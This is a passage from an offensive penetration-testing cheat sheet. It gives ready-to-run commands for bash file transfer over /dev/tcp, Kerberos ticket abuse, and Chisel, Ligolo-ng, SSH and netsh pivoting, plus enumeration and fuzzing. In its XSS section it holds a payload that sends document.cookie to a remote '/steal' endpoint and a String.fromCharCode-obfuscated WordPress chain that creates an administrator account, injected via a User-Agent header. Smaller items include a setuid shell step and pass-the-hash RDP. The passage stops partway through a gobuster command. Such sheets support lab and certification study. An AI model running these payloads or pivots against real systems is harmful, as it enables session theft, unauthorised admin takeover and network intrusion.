###### wget version Paste directly to the shell. ```bash function __wget() { : ${DEBUG:=0} local URL=$1 local tag="Connection: close" local mark=0 if [ -z "${URL}" ]; then printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \ "${FUNCNAME[0]}" "${FUNCNAME[0]}" return 1; fi read proto server path <<<$(echo ${URL//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST" [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT" [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC" exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3 while read line; do [[ $mark -eq 1 ]] && echo $line if [[ "${line}" =~ "${tag}" ]]; then mark=1 fi done <&3 exec 3>&- } ``` ```shell __wget http://<LHOST>/<FILE> ``` ###### curl version ```bash function __curl() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } ``` ```shell __curl http://<LHOST>/<FILE> > <OUTPUT_FILE> ``` #### FTP ```shell ftp <RHOST> ftp -A <RHOST> wget -r ftp://anonymous:anonymous@<RHOST> ``` #### Kerberos ```shell sudo apt-get install krb5-kdc ``` ##### Ticket Handling ```shell impacket-getTGT <DOMAIN>/<USERNAME>:'<PASSWORD>' export KRB5CCNAME=<FILE>.ccache export KRB5CCNAME='realpath <FILE>.ccache' ``` ##### Kerberos related Files ```shell /etc/krb5.conf // kerberos configuration file location kinit <USERNAME> // creating ticket request klist // show available kerberos tickets kdestroy // delete cached kerberos tickets .k5login // resides kerberos principals for login (place in home directory) krb5.keytab // "key table" file for one or more principals kadmin // kerberos administration console add_principal <EMAIL> // add a new user to a keytab file ksu // executes a command with kerberos authentication klist -k /etc/krb5.keytab // lists keytab file kadmin -p kadmin/<EMAIL> -k -t /etc/krb5.keytab // enables editing of the keytab file ``` ##### Ticket Conversion ###### kribi to ccache ```shell base64 -d <USERNAME>.kirbi.b64 > <USERNAME>.kirbi impacket-ticketConverter <USERNAME>.kirbi <USERNAME>.ccache export KRB5CCNAME=`realpath <USERNAME>.ccache` ``` ###### ccache to kirbi ```shell impacket-ticketConverter <USERNAME>.ccache <USERNAME>.kirbi base64 -w0 <USERNAME>.kirbi > <USERNAME>.kirbi.base64 ``` #### Ligolo-ng > https://github.com/nicocha30/ligolo-ng ##### Download Proxy and Agent ```shell wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz ``` ##### Prepare Tunnel Interface ```shell sudo ip tuntap add user $(whoami) mode tun ligolo ``` ```shell sudo ip link set ligolo up ``` ##### Setup Proxy on Attacker Machine ```shell ./proxy -laddr <LHOST>:443 -selfcert ``` ##### Setup Agent on Target Machine ```shell ./agent -connect <LHOST>:443 -ignore-cert ``` ##### Configure Session ```shell ligolo-ng » session ``` ```shell [Agent : user@target] » ifconfig ``` ```shell sudo ip r add 172.16.1.0/24 dev ligolo ``` ```shell [Agent : user@target] » start ``` ###### Port Forwarding ```shell [Agent : user@target] » listener_add --addr <RHOST>:<LPORT> --to <LHOST>:<LPORT> --tcp ``` #### Linux ##### CentOS ```shell doas -u <USERNAME> /bin/sh ``` ##### Environment Variables ```shell export PATH=`pwd`:$PATH ``` ##### gcc ```shell gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit i686-w64-mingw32-gcc -o main32.exe main.c x86_64-w64-mingw32-gcc -o main64.exe main.c ``` ##### getfacl ```shell getfacl <LOCAL_DIRECTORY> ``` ##### iconv ```shell echo "<COMMAND>" | iconv -t UTF-16LE | base64 -w 0 echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 iconv -f ASCII -t UTF-16LE <FILE>.txt | base64 | tr -d "\n" ``` ##### vi ```shell :w !sudo tee % # save file with elevated privileges without exiting ``` ##### Windows Command Formatting ```shell echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 ``` #### Microsoft Windows ##### dir ```cmd dir /a dir /a:d dir /a:h dir flag* /s /p dir /s /b *.log ``` #### NFS ```shell sudo mount -t nfs -o vers=4,nolock <RHOST>:/<FOLDER> /PATH/TO/FOLDER/<FOLDER> ``` #### PHP Webserver ```shell sudo php -S 127.0.0.1:80 ``` #### Ping ```shell ping -c 1 <RHOST> ping -n 1 <RHOST> ``` #### Port Forwarding ##### Chisel | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | ###### Reverse Pivot - LHOST < APPLICATION SERVER ###### LHOST ```shell ./chisel server -p 9002 -reverse -v ``` ###### APPLICATION SERVER ```shell ./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000 ``` ###### SOCKS5 / Proxychains Configuration - LHOST > APPLICATION SERVER > NETWORK ###### LHOST ```shell ./chisel server -p 9002 -reverse -v ``` ###### APPLICATION SERVER ```shell ./chisel client 192.168.50.10:9002 R:socks ``` ##### Ligolo-ng > https://github.com/nicocha30/ligolo-ng | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > NETWORK ###### Download Proxy and Agent > https://github.com/nicocha30/ligolo-ng/releases ```shell wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz ``` ###### Prepare Tunnel Interface ```shell sudo ip tuntap add user $(whoami) mode tun ligolo ``` ```shell sudo ip link set ligolo up ``` ###### Setup Proxy on LHOST ```shell ./proxy -laddr 192.168.50.10:443 -selfcert ``` ###### Setup Agent on APPLICATION SERVER ```shell ./agent -connect 192.168.50.10:443 -ignore-cert ``` ###### Configure Session ```shell ligolo-ng » session ``` ```shell [Agent : user@target] » ifconfig ``` ```shell sudo ip r add 172.16.50.0/24 dev ligolo ``` ```shell [Agent : user@target] » start ``` ###### Port Forwarding - LHOST < APPLICATION SERVER > DATABASE SERVER ```shell [Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp ``` ##### Socat | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER ###### APPLICATION SERVER ```shell ip a ip r socat -ddd TCP-LISTEN:2345,fork TCP:<RHOST>:5432 ``` ###### LHOST ```shell psql -h <RHOST> -p 2342 -U postgres ``` ##### SSH Tunneling ###### Local Port Forwarding | System | IP address | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### APPLICATION SERVER ```shell python3 -c 'import pty;pty.spawn("/bin/bash")' ssh <USERNAME>@192.168.100.10 ip a ip r for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <USERNAME>@10.10.100.20 ``` ###### LHOST ```shell smbclient -p 4455 //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD> ``` ###### Dynamic Port Forwarding | System | IP address | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### APPLICATION SERVER ```shell python3 -c 'import pty;pty.spawn("/bin/bash")' ssh -N -D 0.0.0.0:9999 <USERNAME>@10.10.100.20 ``` ###### LHOST ```shell sudo ss -tulpn tail /etc/proxychains4.conf socks5 192.168.50.10 9999 proxychains smbclient -p 4455 //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD> ``` ###### Remote Port Forwarding | System | IP address | | --- | --- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST <-> FIREWALL <-> APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST ###### LHOST ```shell sudo systemctl start ssh sudo ss -tulpn ``` ###### APPLICATION SERVER ```shell python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 <USERNAME>@192.168.50.10 ``` ###### LHOST ```shell psql -h 127.0.0.1 -p 2345 -U postgres ``` ###### Remote Dynamic Port Forwarding | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < APPLICATION SERVER > NETWORK ###### APPLICATION SERVER ```shell python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -R 9998 <USERNAME>@192.168.50.10 ``` ###### LHOST ```shell sudo ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20 ``` ##### sshuttle | System | IP address | | ------------------ | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > NETWORK ###### APPLICATION SERVER ```shell socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22 ``` ###### LHOST ```shell sshuttle -r <USERNAME>@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24 smbclient -L //172.16.50.10/ -U <USERNAME> --password=<PASSWORD> ``` ##### ssh.exe | System | IP address | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > NETWORK ###### LHOST ```shell sudo systemctl start ssh xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:192.168.100.20 ``` ###### WINDOWS JUMP SERVER ```shell where ssh C:\Windows\System32\OpenSSH\ssh.exe C:\Windows\System32\OpenSSH> ssh -N -R 9998 <USERNAME>@192.168.50.10 ``` ###### LHOST ```shell ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains psql -h 10.10.100.20 -U postgres ``` ##### Plink | System | IP address | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER ###### LHOST ```shell find / -name plink.exe 2>/dev/null /usr/share/windows-resources/binaries/plink.exe ``` ###### WINDOWS JUMP SERVER ```cmd plink.exe -ssh -l <USERNAME> -pw <PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10 ``` ###### LHOST ```shell ss -tulpn xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:127.0.0.1:9833 ``` ##### Netsh | System | IP address | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > DATABASE SERVER ###### LHOST ```shell xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:192.168.100.20 ``` ###### WINDOWS JUMP SERVER ```cmd netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20 netstat -anp TCP | findstr "2222" netsh interface portproxy show all netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow ``` ###### LHOST ```shell sudo nmap -sS 192.168.50.10 -Pn -n -p2222 ssh [email protected] -p2222 ``` ###### WINDOWS JUMP SERVER ```cmd netsh advfirewall firewall delete rule name="port_forward_ssh_2222" netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10 ``` #### Python Webserver ```shell sudo python -m SimpleHTTPServer 80 sudo python3 -m http.server 80 ``` #### RDP ```shell xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /cert-ignore xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /d:<DOMAIN> /cert-ignore xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /dynamic-resolution +clipboard xfreerdp /v:<RHOST> /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla rdesktop <RHOST> ``` #### showmount ```shell /usr/sbin/showmount -e <RHOST> sudo showmount -e <RHOST> chown root:root sid-shell; chmod +s sid-shell ``` #### SMB ```shell mount.cifs //<RHOST>/<SHARE> /mnt/remote guestmount --add '/<MOUNTPOINT>/<DIRECTORY/FILE>' --inspector --ro /mnt/<MOUNT> -v ``` #### smbclient ```shell smbclient -L \\<RHOST>\ -N smbclient -L //<RHOST>/ -N smbclient -L ////<RHOST>/ -N smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD> smbclient -U "<USERNAME>" -L \\\\<RHOST>\\ smbclient //<RHOST>/<SHARE> smbclient //<RHOST>/<SHARE> -U <USERNAME> smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD> smbclient "\\\\<RHOST>\<SHARE>" smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 smbclient --no-pass //<RHOST>/<SHARE> ``` ##### Download multiple files at once ```shell mask"" recurse ON prompt OFF mget * ``` #### SSH ##### Using outdated Algorithms ```shell ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1 ``` ##### Fixing SSH Private Key ```shell dos2unix id_rsa vim --clean id_rsa chmod 600 id_rsa ``` ```shell dos2unix id_rsa; vim --clean -c 'wq' id_rsa; chmod 600 id_rsa ``` #### Time and Date ##### Get the Server Time ```shell sudo nmap -sU -p 123 --script ntp-info <RHOST> ``` ##### Stop virtualbox-guest-utils to stop syncing Time ```shell sudo /etc/init.d/virtualbox-guest-utils stop ``` ##### Stop systemd-timesyncd to sync Time manually ```shell sudo systemctl stop systemd-timesyncd ``` ##### Disable automatic Sync ```shell sudo systemctl disable --now chronyd ``` ##### Options to set the Date and Time ```shell sudo net time -c <RHOST> sudo net time set -S <RHOST> sudo net time \\<RHOST> /set /y sudo ntpdate <RHOST> sudo ntpdate -s <RHOST> sudo ntpdate -b -u <RHOST> sudo timedatectl set-timezone UTC sudo timedatectl list-timezones sudo timedatectl set-timezone '<COUNTRY>/<CITY>' sudo timedatectl set-time 15:58:30 sudo timedatectl set-time '2015-11-20 16:14:50' sudo timedatectl set-local-rtc 1 ``` ##### Keep in Sync with a Server ```shell while [ 1 ]; do sudo ntpdate <RHOST>;done ``` #### Tmux ```shell ctrl b + w # show windows ctrl + " # split window horizontal ctrl + % # split window vertical ctrl + , # rename window ctrl + { # flip window ctrl + } # flip window ctrl + spacebar # switch pane layout ``` Copy & Paste ```shell :setw -g mode-keys vi ctrl b + [ space enter ctrl b + ] ``` Search ```shell ctrl b + [ # enter copy ctrl + / # enter search while within copy mode for vi mode n # search next shift + n # reverse search ``` Logging ```shell ctrl b shift + P # start / stop ``` Save Output ```shell ctrl b + : capture-pane -S - ctrl b + : save-buffer <FILE>.txt ``` #### Upgrading Shells ```shell python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl + z stty raw -echo fg Enter Enter export XTERM=xterm ``` or ```shell Ctrl + z stty -a stty raw -echo;fg Enter Enter stty rows 37 cols 123 export TERM=xterm-256color bash ``` Alternatively: ```shell script -q /dev/null -c bash /usr/bin/script -qc /bin/bash /dev/null ``` ### Oneliner ```shell stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; ``` #### Fixing Staircase Effect ```shell env reset ``` or ```shell stty onlcr ``` #### VirtualBox ```shell sudo pkill VBoxClient && VBoxClient --clipboard ``` #### virtualenv ```shell sudo apt-get install virtualenv virtualenv -p python2.7 venv . venv/bin/activate ``` ```cmd python.exe -m pip install virtualenv python.exe -m virtualenv venv venv\Scripts\activate ``` ### Information Gathering #### memcached > https://github.com/pd4d10/memcached-cli ```shell memcrashed / 11211/UDP npm install -g memcached-cli memcached-cli <USERNAME>:<PASSWORD>@<RHOST>:11211 echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211 STAT pid 21357 STAT uptime 41557034 STAT time 1519734962 sudo nmap <RHOST> -p 11211 -sU -sS --script memcached-info stats items stats cachedump 1 0 get link get file get user get passwd get account get username get password ``` #### NetBIOS ```shell nbtscan <RHOST> nmblookup -A <RHOST> ``` #### Nmap ```shell sudo nmap -A -T4 -sC -sV -p- <RHOST> sudo nmap -sV -sU <RHOST> sudo nmap -A -T4 -sC -sV --script vuln <RHOST> sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <RHOST> sudo nmap -sC -sV -p- --scan-delay 5s <RHOST> sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <RHOST> ls -lh /usr/share/nmap/scripts/*ssh* locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb ``` #### Port Scanning ```shell for p in {1..65535}; do nc -vn <RHOST> $p -w 1 -z & done 2> <FILE>.txt ``` ```shell export ip=<RHOST>; for port in $(seq 1 65535); do timeout 0.01 bash -c "</dev/tcp/$ip/$port && echo The port $port is open || echo The Port $port is closed > /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done ``` #### snmpwalk ```shell snmpwalk -c public -v1 <RHOST> snmpwalk -v2c -c public <RHOST> 1.3.6.1.2.1.4.34.1.3 snmpwalk -v2c -c public <RHOST> .1 snmpwalk -v2c -c public <RHOST> nsExtendObjects snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.25 snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.4.2.1.2 snmpwalk -c public -v1 <RHOST> .1.3.6.1.2.1.1.5 snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.3.1.1 snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.27 snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.6.13.1.3 snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.6.3.1.2 ``` ### Web Application Analysis #### Burp Suite ```shell Ctrl+r // Sending request to repeater Ctrl+i // Sending request to intruder Ctrl+Shift+b // base64 encoding Ctrl+Shift+u // URL decoding ``` #### Set Proxy Environment Variables ```shell export HTTP_PROXY=http://localhost:8080 export HTTPS_PROXY=https://localhost:8080 ``` #### cadaver ```shell cadaver http://<RHOST>/<WEBDAV_DIRECTORY>/ ``` ```shell dav:/<WEBDAV_DIRECTORY>/> cd C dav:/<WEBDAV_DIRECTORY>/C/> ls dav:/<WEBDAV_DIRECTORY>/C/> put <FILE> ``` #### Cross-Site Scripting (XSS) ```javascript <sCrIpt>alert(1)</ScRipt> <script>alert('XSS');</script> <script>alert(document.cookies)</script> <script>document.querySelector('#foobar-title').textContent = '<TEXT>'</script> <script>fetch('https://<RHOST>/steal?cookie=' + btoa(document.cookie));</script> <script>user.changeEmail('user@domain');</script> <iframe src=file:///etc/passwd height=1000px width=1000px></iframe> <img src='http://<RHOST>'/> ``` ##### XSS client-Side Attack ###### Request Example ```javascript <a href="http://<RHOST>/send_btc?account=<USERNAME>&amount=100000"">foobar!</a> ``` ###### Get nonce ```javascript var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/user-new.php"; var nonceRegex = /ser" value="([^"]*?)"/g; ajaxRequest.open("GET", requestURL, false); ajaxRequest.send(); var nonceMatch = nonceRegex.exec(ajaxRequest.responseText); var nonce = nonceMatch[1]; ``` ###### Update Payload Script ```javascript var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=<USERNAME>&email=<EMAIL>&pass1=<PASSWORD>&pass2=<PASSWORD>&role=administrator"; ajaxRequest = new XMLHttpRequest(); ajaxRequest.open("POST", requestURL, true); ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); ajaxRequest.send(params); ``` ###### Compress Payload Script > https://jscompress.com/ ```javascript var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=<USERNAME>&email=<EMAIL>&pass1=<PASSWORD>&pass2=<PASSWORD>&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params); ``` ##### Encoding Function ```javascript function encode_to_javascript(string) { var input = string var output = ''; for(pos = 0; pos < input.length; pos++) { output += input.charCodeAt(pos); if(pos != (input.length - 1)) { output += ","; } } return output; } let encoded = encode_to_javascript('var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=<USERNAME>&email=<EMAIL>&pass1=<PASSWORD>&pass2=<PASSWORD>&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params);') console.log(encoded) ``` ###### Encoded Payload ```shell 118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9 ``` ###### Execution ```shell curl -i http://<RHOST> --user-agent "<script>eval(String.fromCharCode(118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9 ))</script>" --proxy 127.0.0.1:8080 ``` #### ffuf ```shell ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ --fs <NUMBER> -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ --fw <NUMBER> -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<RHOST>/backups/backup_2020070416FUZZ.zip ``` ##### API Fuzzing ```shell ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412 ``` ##### Searching for LFI ```shell ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349 ``` ##### Fuzzing with PHP Session ID ```shell ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ``` ##### Recursion ```shell ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/basic/FUZZ -recursion ``` ##### File Extensions ```shell ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/ext/logs/FUZZ -e .log ``` ##### Rate Limiting ```shell ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://<RHOST>/cd/rate/FUZZ -mc 200,429 ``` ##### Virtual Host Discovery ```shell ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -fs 1495 ``` ##### Massive File Extension Discovery ```shell ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip ``` #### GitTools ```shell ./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/ ``` #### Gobuster ```shell -e // extended mode that renders the full url -k // skip ssl certificate validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --wildcard // set wildcard option $ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/ -x php $ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<RHOST>/ -x php,txt,html,js -e -s 200 $ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard ``` ##### Common File Extensions ```shell txt,bak,php,html,js,asp,aspx ``` ##### Common Picture Extensions ```shell png,jpg,jpeg,gif,bmp ``` ##### POST Requests ```shell gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200 ``` ##### DNS Recon ```shell gobuster dns -d <RHOST> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt ``` ##### VHost Discovery ```shell gobuster vhost -u 